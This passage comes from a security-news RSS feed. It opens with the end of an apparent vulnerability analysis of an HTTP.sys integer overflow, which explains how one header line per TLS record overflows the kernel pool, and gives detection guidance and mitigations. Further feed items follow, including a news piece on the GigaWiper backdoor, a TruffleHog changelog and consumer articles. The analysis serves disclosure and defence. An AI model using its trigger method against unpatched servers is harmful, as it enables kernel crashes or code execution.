  <p class="">The decrypted payload of each TLS record is delivered independently to the HTTP parser via</p><p class=""><em>UlHttpBufferReceiveEvent()</em>, regardless of how many TLS records the underlying TCP connection coalesces into a single TCP segment. This behavior is distinct from plaintext HTTP connections, where the Windows TCP stack coalesces multiple segments into a single receive indication before the data reaches <em>HTTP.sys</em>.</p><p class="">The HTTP parser maintains a per-request state object that includes a dynamically grown buffer reference array. The <em>capacity</em> field stores the current number of allocated slots in the buffer reference array. The <em>count</em> field stores the number of slots currently in use. The <em>ref_array_ptr</em> field points to the dynamically allocated array of 8-byte buffer reference entries.</p><p class="">An integer overflow vulnerability exists in <em>HTTP.sys</em>. The vulnerability is due to insufficient bounds checking when growing a buffer reference array during HTTP/1.x header parsing. When <em>HTTP.sys</em> receives data for an HTTP/1.x request, it allocates a <em>UL_REQUEST_BUFFER</em> structure for each receive indication and tracks these buffers in the per-request reference array described above. The <em>count</em> field records the number of active buffer references, and the <em>capacity</em> field records the total number of allocated slots. </p><p class="">As the HTTP parser (<em>UlpParseNextRequest()</em>) processes header lines, it calls an inline buffer reference routine each time a new receive buffer is consumed. When <em>count</em> reaches <em>capacity</em>, the routine grows the array by reallocating it with five additional slots. The new allocation size is computed as 0x28 + <em>capacity</em> * 8, the contents of the existing array are copied via <em>memmove</em> using <em>count</em> * 8 as the copy length, and <em>capacity</em> is incremented by 5 as a 16-bit unsigned integer addition. No overflow check is performed on this addition.</p><p class="">After 13,107 growth events, <em>capacity</em> reaches 0xFFFB. The next growth adds 5, producing 0x10000, which truncates to 0x0000 in the 16-bit field. On the subsequent buffer reference addition, <em>count</em> (which is now 65,536 or greater) exceeds the zero <em>capacity</em>, triggering another growth. The allocation size computation 0x28 + 0 * 8 produces a 40-byte allocation, but the <em>memmove</em> copies <em>count</em> * 8 bytes (approximately 524,256 bytes) from the old buffer into the 40-byte allocation. This results in a kernel pool heap buffer overflow of over 500 kilobytes.</p><p class="">Each buffer reference corresponds to one receive buffer delivered to the HTTP parser. For plaintext HTTP connections, the Windows TCP stack coalesces received segments into large indications, and <em>UlpMergeBuffers() </em>further combines buffers within <em>HTTP.sys</em>. Over TLS connections, each TLS record is decrypted independently by SChannel and delivered as a separate buffer through <em>UlHttpBufferReceiveEvent()</em> into <em>UlpCopyIndicatedData()</em>. If each TLS record contains exactly one complete header line (terminated by CRLF), the HTTP parser fully consumes the buffer without setting the partial-parse flag, causing <em>UlpAdjustBuffers()</em> to advance to the next buffer via its non-merge path. This creates a 1:1 correspondence between TLS records sent and buffer references accumulated.</p><p class="">To trigger the overflow, an attacker crafts an HTTP request in which each header line is encapsulated in a separate TLS application data record. Given a minimum header line size of approximately 4 bytes and a required count of 65,536 buffer references, the total request size comes to roughly 262,144 bytes. The <em>MaxRequestBytes </em>registry value (at <em>HKLM\SYSTEM\CurrentControlSet\Services\HTTP\Parameters</em>) must be configured to a value of at least 262,144 bytes for the server to accept a request of this size. The default value of 16,384 bytes limits the request to approximately 4000 header lines, which is insufficient to trigger the overflow. As a mitigation, keeping <em>MaxRequestBytes</em> at or below 65,535 bytes represents the most conservative configuration to prevent this attack.</p><p class="">A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted HTTP/1.x request over a TLS connection to an affected server. Successful exploitation results in unexpected system termination due to a memory access exception in the context of the kernel. Under specific memory layout conditions, exploitation could result in arbitrary code execution in the context of the kernel.</p><p class=""><strong>Notes:</strong></p><p class="">• The vulnerability is only reachable through HTTP/1.x header parsing over TLS connections. HTTP/2 and HTTP/3 use different parser paths that do not interact with the buffer reference array.</p><p class="">• Body data parsing (Content-Length or chunked transfer encoding) does not add entries to the buffer reference array. Only header parsing triggers buffer reference growth.</p><p class="">• At a sending rate of 10 milliseconds per TLS record, the overflow requires approximately 11 minutes to trigger.</p><p class=""><strong>Source Code Walkthrough</strong></p><p class="">The following code snippet was taken from <em>HTTP.sys</em> version 10.0.26100.7705. Comments added by TrendAI Research have been highlighted.</p><p class="">In <em>UlpParseNextRequest()</em>:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  






  <p class=""><strong>Detection Guidance</strong></p><p class="">To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the TCP port 443.</p><p class="">The traffic on the affected port(s) is TLS-encrypted. The detection device must be able to decrypt the TLS traffic before applying the following detection method. The detection device should monitor for HTTPS connections.</p><p class="">An HTTP/1.x request [1] consists of a request line followed by zero or more header field lines, each terminated by CRLF. The following grammar defines the relevant structure:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  






  <p class=""><em>Decrypted traffic inspection:</em></p><p class="">After decrypting the TLS session, the detection device must parse the HTTP/1.x request headers. The detection device must count the number of distinct header field lines present in a single HTTP request. If the number of header field lines in a single request exceeds 1,000, the traffic should be considered suspicious; an attack exploiting this vulnerability is likely underway.</p><p class=""><em>Encrypted traffic heuristics:</em></p><p class="">Where decryption is not available, the detection device should inspect the pattern of TLS application data records within the encrypted session. If each TLS application data record contains a single short payload and the total number of such records on a single connection exceeds 1,000, the traffic should be considered suspicious; an attack exploiting this vulnerability is likely underway.</p><p class=""><em>Notes:</em></p><p class="">• The preferred detection method (header line count) requires the ability to decrypt TLS traffic, for example through TLS inspection, a decrypting proxy, or possession of the server's private key. This method directly observes the attack indicator and produces low false-positive and false-negative rates.</p><p class="">• The TLS record heuristic operates on encrypted traffic and does not require decryption. This method is more prone to false positives (legitimate applications that send many small TLS records, such as interactive streaming sessions, may trigger the heuristic) and to false negatives (the threshold is based on observable record sizes rather than the actual header count that determines exploitability). Where possible, decrypted traffic inspection should be preferred.</p><p class="">• The attack requires approximately 11 minutes of sustained connection to accumulate sufficient header lines. Connection duration monitoring may serve as a supplementary detection heuristic.</p><p class=""><strong>Conclusion</strong></p><p class="">This vulnerability was <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291">patched</a> by Microsoft in the June 2026 release cycle. They note several mitigations that include editing the registry to ensure unpatched systems are not vulnerable to exploitation. However, the best method to ensure this bug has been fully remediated is to test and deploy the vendor-supplied patch.</p><p class="">Special thanks to Yazhi Wang and Jonathan Lein of the TrendAI Research team for providing such a thorough analysis of this vulnerability. For an overview of TrendAI Research services, please visit <a href="https://go.trendmicro.com/tis/vulnerabilities.html">https://go.trendmicro.com/tis/vulnerabilities.html</a>.</p><p class="">The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, or <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a> for the latest in exploit techniques and security patches.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FastNetMon Launches Netomics, a Self-Hosted Routing Intelligence Platform]]></title>
<description><![CDATA[London, United Kingdom, July 10th, 2026, CyberNewswire New platform gives network operators complete visibility into Internet routing while keeping all routing intelligence inside their own infrastructure. FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that co...]]></description>
<link>https://tsecurity.de/de/3659568/it-security-nachrichten/fastnetmon-launches-netomics-a-self-hosted-routing-intelligence-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659568/it-security-nachrichten/fastnetmon-launches-netomics-a-self-hosted-routing-intelligence-platform/</guid>
<pubDate>Fri, 10 Jul 2026 13:38:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>London, United Kingdom, July 10th, 2026, CyberNewswire New platform gives network operators complete visibility into Internet routing while keeping all routing intelligence inside their own infrastructure. FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that combines live routing data, registry information, RPKI validation, routing history and AI-assisted querying into a single application. Built […]</p>
<p>The post <a href="https://gbhackers.com/fastnetmon-launches-netomics-a-self-hosted-routing-intelligence-platform/">FastNetMon Launches Netomics, a Self-Hosted Routing Intelligence Platform</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FastNetMon Launches Netomics, a Self-Hosted Routing Intelligence Platform]]></title>
<description><![CDATA[London, United Kingdom, July 10th, 2026, CyberNewswire New platform gives network operators complete visibility into Internet routing while keeping all routing intelligence inside their own infrastructure. FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that co...]]></description>
<link>https://tsecurity.de/de/3659566/it-security-nachrichten/fastnetmon-launches-netomics-a-self-hosted-routing-intelligence-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659566/it-security-nachrichten/fastnetmon-launches-netomics-a-self-hosted-routing-intelligence-platform/</guid>
<pubDate>Fri, 10 Jul 2026 13:38:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>London, United Kingdom, July 10th, 2026, CyberNewswire New platform gives network operators complete visibility into Internet routing while keeping all routing intelligence inside their own infrastructure. FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that combines live routing data, registry information, RPKI validation, routing history and AI-assisted querying into a single application. Built […]</p>
<p>The post <a href="https://cybersecuritynews.com/fastnetmon-launches-netomics-routing-intelligence-platform/">FastNetMon Launches Netomics, a Self-Hosted Routing Intelligence Platform</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft uncovers GigaWiper, a backdoor designed for destruction on demand]]></title>
<description><![CDATA[Microsoft is warning defenders about a new backdoor that blurs the line between espionage malware and wipers.



In a technical analysis published on Thursday, Microsoft Threat Intelligence detailed GigaWiper, a Golang-based implant first observed in October 2025 intrusions that combines remote a...]]></description>
<link>https://tsecurity.de/de/3659201/it-security-nachrichten/microsoft-uncovers-gigawiper-a-backdoor-designed-for-destruction-on-demand/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659201/it-security-nachrichten/microsoft-uncovers-gigawiper-a-backdoor-designed-for-destruction-on-demand/</guid>
<pubDate>Fri, 10 Jul 2026 11:07:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft is warning defenders about a new backdoor that blurs the line between espionage malware and wipers.</p>



<p>In a technical analysis published on Thursday, Microsoft Threat Intelligence detailed GigaWiper, a Golang-based implant first observed in October 2025 intrusions that combines remote administration capabilities with multiple disk-wiping and ransomware routines.</p>



<p>Rather than building a new destructive tool from scratch, the operators assembled GigaWiper from several existing malware families, embedding them as modular commands inside a single backdoor.</p>



<p>“GigaWiper is particularly notable for its makeup,” Microsoft researchers <a href="https://www.microsoft.com/en-us/security/blog/2026/07/09/gigawiper-anatomy-of-a-destructive-backdoor-assembled-from-multiple-malware/" target="_blank" rel="noreferrer noopener">said</a>. “The consolidation of multiple destructive capabilities into a modular backdoor reflects a notable shift in wiper malware, which are typically designed purely to destroy rather than to extort and carry real-world consequences.”</p>



<p>Malware capabilities of the backdoor included multiple disk wiping logics, an irreversible Crucio ransomware encryption, persistence, and RabbitMQ and Redis-based communication.</p>



<h2 class="wp-block-heading"><a></a>A backdoor for destruction on demand</h2>



<p>According to Microsoft, GigaWiper exists in two forms. A standalone wiper and a larger backdoor whose command set embeds the standalone wiping functionality alongside numerous administrative features.</p>



<p>Written in Go, the malware supports 20 command codes that enable operators to execute <a href="https://www.csoonline.com/article/4006326/how-to-log-and-monitor-powershell-activity-for-suspicious-scripts-and-commands.html">PowerShell </a>commands, manage Windows services and processes, manipulate the registry, capture screenshots, record displays, clear event logs, and remotely control infected systems through a Virtual Network Computing (<a href="https://www.csoonline.com/article/573427/exposed-vnc-threatens-critical-infrastructure-as-attacks-spike.html">VNC</a>)-like capability.</p>



<p>Persistence is established through a scheduled task posing as a “OneDrive Update,” while command-and-control (C2) relies on <a href="https://www.csoonline.com/article/572033/fbis-warning-about-iranian-firm-highlights-common-cyberattack-tactics.html?utm=hybrid_search#:~:text=RabbitMQ%20service%20on%20SolarWinds">RabbitMQ</a> for receiving instructions and <a href="https://www.csoonline.com/article/1308535/new-redis-attack-campaign-weakens-systems-before-deploying-cryptominer.html">Redis </a>for returning command output. This architecture allows attackers to quietly maintain access and selectively activate destructive functionality when an objective has been achieved, the researchers added.</p>



<h2 class="wp-block-heading"><a></a>The backdoor combines three malware families</h2>



<p>Microsoft researchers found that GigaWiper integrates destructive code from multiple malware families instead of relying on a single wiping mechanism.</p>



<p>These integrations show up in the form of separate commands that the backdoor supports.<br><br>One command performs raw physical disk wiping by overwriting drives and removing partition metadata. Another borrows from the Crucio ransomware family, encrypting files with randomly generated keys that are intentionally never stored, making recovery impossible despite presenting itself like ransomware.</p>



<p>A third command recreates the functionality of FlockWiper, implementing secure multi-pass wiping in Go to permanently erase data on Windows systems.</p>



<p>“We tied GigaWiper to both Crucio and FlockWiper based on code analysis, shared execution flow, function naming, and unique strings,” the researchers said. “Crucio’s code was the base for GigaWiper command 3, and FlockWiper was re-coded in Golang and updated for GigaWiper command 12,” they noted, referring to the 20 listed commands the backdoor supports.</p>



<p>The standalone wiper was implemented as command 1 from the list.</p>



<p>Microsoft recommended hardening endpoints and identities, enabling behavioral detection and endpoint detection and response (EDR) capabilities, and using attack surface reduction controls to limit compromise risks. </p>



<p>The company also urged defenders to maintain offline or otherwise resilient backups, as destructive malware like GigaWiper is designed to irreversibly wipe or encrypt data. To support detection, the researchers shared a list of indicators of compromise (IOCs), which included FlockWiper and Crucio file hashes and a couple of C2 IP addresses.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Most data brokers won’t tell you what happened to your deletion request]]></title>
<description><![CDATA[Data brokers collect personal details on most adults in the United States and sell them to buyers that include employers, landlords, insurance companies, and government agencies. California gives residents a way to push back. You can ask a broker to delete your records, or to stop selling and sha...]]></description>
<link>https://tsecurity.de/de/3658931/it-security-nachrichten/most-data-brokers-wont-tell-you-what-happened-to-your-deletion-request/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658931/it-security-nachrichten/most-data-brokers-wont-tell-you-what-happened-to-your-deletion-request/</guid>
<pubDate>Fri, 10 Jul 2026 09:08:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Data brokers collect personal details on most adults in the United States and sell them to buyers that include employers, landlords, insurance companies, and government agencies. California gives residents a way to push back. You can ask a broker to delete your records, or to stop selling and sharing them. A team at UC Irvine decided to find out what happens when someone sends those requests to the whole California registry. The answer gives consumers … <a href="https://www.helpnetsecurity.com/2026/07/10/trouble-with-data-broker-deletion-requests/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/10/trouble-with-data-broker-deletion-requests/">Most data brokers won’t tell you what happened to your deletion request</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v3.95.9]]></title>
<description><![CDATA[What's Changed

feat: add OpenRouter detector by @McPatate in #4500
Integrations fully codeowns detectors by @trufflesteeeve in #5104
[INS-332] Add New Relic Insights Insert key detector by @mustansir14 in #4778
[INS-351] Added Duffel Token Detector by @MuneebUllahKhan222 in #4795
[INS-341] Added...]]></description>
<link>https://tsecurity.de/de/3658403/it-security-tools/v3959/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658403/it-security-tools/v3959/</guid>
<pubDate>Fri, 10 Jul 2026 01:18:10 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>feat: add OpenRouter detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/McPatate/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/McPatate">@McPatate</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3517947044" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4500" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4500/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4500">#4500</a></li>
<li>Integrations fully codeowns detectors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/trufflesteeeve/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/trufflesteeeve">@trufflesteeeve</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4789682373" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5104" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5104/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5104">#5104</a></li>
<li>[INS-332] Add New Relic Insights Insert key detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mustansir14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mustansir14">@mustansir14</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4001992848" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4778" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4778/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4778">#4778</a></li>
<li>[INS-351] Added Duffel Token Detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4033734488" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4795" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4795/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4795">#4795</a></li>
<li>[INS-341] Added Shippo detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087785248" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4820" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4820/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4820">#4820</a></li>
<li>[INS-467] Add IPinfo detector to default detectors list by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mustansir14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mustansir14">@mustansir14</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467638370" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4970" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4970/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4970">#4970</a></li>
<li>fix: reject --include-repos/--exclude-repos with --repo in github scan by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kashifkhan0771/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kashifkhan0771">@kashifkhan0771</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4826176133" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5112" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5112/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5112">#5112</a></li>
<li>[INS-468] Add improved lob detector to defaults.go by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mustansir14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mustansir14">@mustansir14</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4468058771" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4971" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4971/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4971">#4971</a></li>
<li>feat(action): add image input to allow registry mirror overrides by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eightseventhreethree/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eightseventhreethree">@eightseventhreethree</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4455074748" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4965" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4965/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4965">#4965</a></li>
<li>feat: Support archived repo exclusion from GH org scans by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hibare/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hibare">@hibare</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226077989" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4875" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4875/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4875">#4875</a></li>
<li>[INT-715] Retry transient failures when verifying OpenAI keys by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bill-rich/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bill-rich">@bill-rich</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4839317359" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5117" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5117/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5117">#5117</a></li>
<li>[INS-410] Added batch token detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4094455295" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4824" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4824/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4824">#4824</a></li>
<li>[INT-650] Don't log as error when git diff is too long by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bill-rich/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bill-rich">@bill-rich</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4830792626" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5113" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5113/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5113">#5113</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/McPatate/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/McPatate">@McPatate</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3517947044" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4500" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4500/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4500">#4500</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eightseventhreethree/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eightseventhreethree">@eightseventhreethree</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4455074748" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4965" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4965/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4965">#4965</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/trufflesecurity/trufflehog/compare/v3.95.8...v3.95.9"><tt>v3.95.8...v3.95.9</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 KI-Funktionen: Live-Untertitel, Übersetzung und Recall – das brauchen Sie wirklich]]></title>
<description><![CDATA[Windows 11 bringt mehrere KI-Funktionen mit, die sofort weiterhelfen. Live-Untertitel zeigen jeden Ton als Text, eine Echtzeit-Übersetzung läuft auf passender Hardware, und Recall durchsucht zurückliegende Bildschirminhalte. Manches steht jedem offen, anderes hängt am Gerät.



Microsoft verteilt...]]></description>
<link>https://tsecurity.de/de/3657190/it-nachrichten/windows-11-ki-funktionen-live-untertitel-uebersetzung-und-recall-das-brauchen-sie-wirklich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657190/it-nachrichten/windows-11-ki-funktionen-live-untertitel-uebersetzung-und-recall-das-brauchen-sie-wirklich/</guid>
<pubDate>Thu, 09 Jul 2026 15:32:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Windows 11 bringt mehrere KI-Funktionen mit, die sofort weiterhelfen. Live-Untertitel zeigen jeden Ton als Text, eine Echtzeit-Übersetzung <a href="https://www.pcwelt.de/article/3141725/snapdragon-x2-elite-ki-notebook-rechenleistung.html" target="_blank" rel="noreferrer noopener">läuft auf passender Hardware</a>, und <a href="https://www.pcwelt.de/article/3141121/windows-recall-deaktivieren-screenshots-loeschen-datenschutz.html" target="_blank" rel="noreferrer noopener">Recall</a> durchsucht zurückliegende Bildschirminhalte. Manches steht jedem offen, anderes hängt am Gerät.</p>



<p>Microsoft verteilt die KI-Funktionen schrittweise und nach Hardware gestaffelt. Ältere Rechner erhalten die Grundfunktionen, neuere Geräte mit eigener KI-Einheit bekommen mehr. Nicht jedes System zeigt sofort alle Optionen, und mit jedem größeren Update kommt Weiteres hinzu. Mehrere Funktionen helfen schon heute im täglichen Einsatz, ohne dass Sie Zusatzsoftware installieren müssen. Die <a href="https://support.microsoft.com/de-de/accessibility/windows/use-live-captions-to-better-understand-audio">offizielle Anleitung zu den Live-Untertiteln stellt Microsoft auf seinen Support-Seiten bereit</a>.</p>



<h2 class="wp-block-heading toc">Live-Untertitel verwandeln jeden Ton in Text</h2>



<p>Die Funktion fängt das Audiosignal Ihres Rechners ab, erkennt gesprochene Sprache und blendet sie als Text ein. Das funktioniert unabhängig von der App. Ob YouTube im Browser, eine Mediathek, ein Podcast, ein Hörbuch oder die Stimme des Gegenübers in einer Videokonferenz – der Text läuft mit. Der Rechner verarbeitet alles vor Ort. Nach dem einmaligen Download der Sprachdateien benötigen Sie keine Internetverbindung mehr, und nichts davon wandert in die Cloud.</p>



<p>Zum Einschalten genügt die Tastenkombination <em>Windows + Strg + L</em>. Alternativ klicken Sie sich über “<em>Einstellungen” -&gt; “Barrierefreiheit” -&gt; “Untertitel</em>” durch und stellen die Live-Untertitel auf Ein. Beim ersten Start lädt Windows die passenden Sprachpakete herunter, ein Vorgang von wenigen Sekunden. Deutsch steht für die reinen Untertitel zur Verfügung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4fa2b556036"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/ki-funktionen-01.png?w=1200" alt="Live-Untertitel in Windows 11" class="wp-image-3178657" width="1200" height="863" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



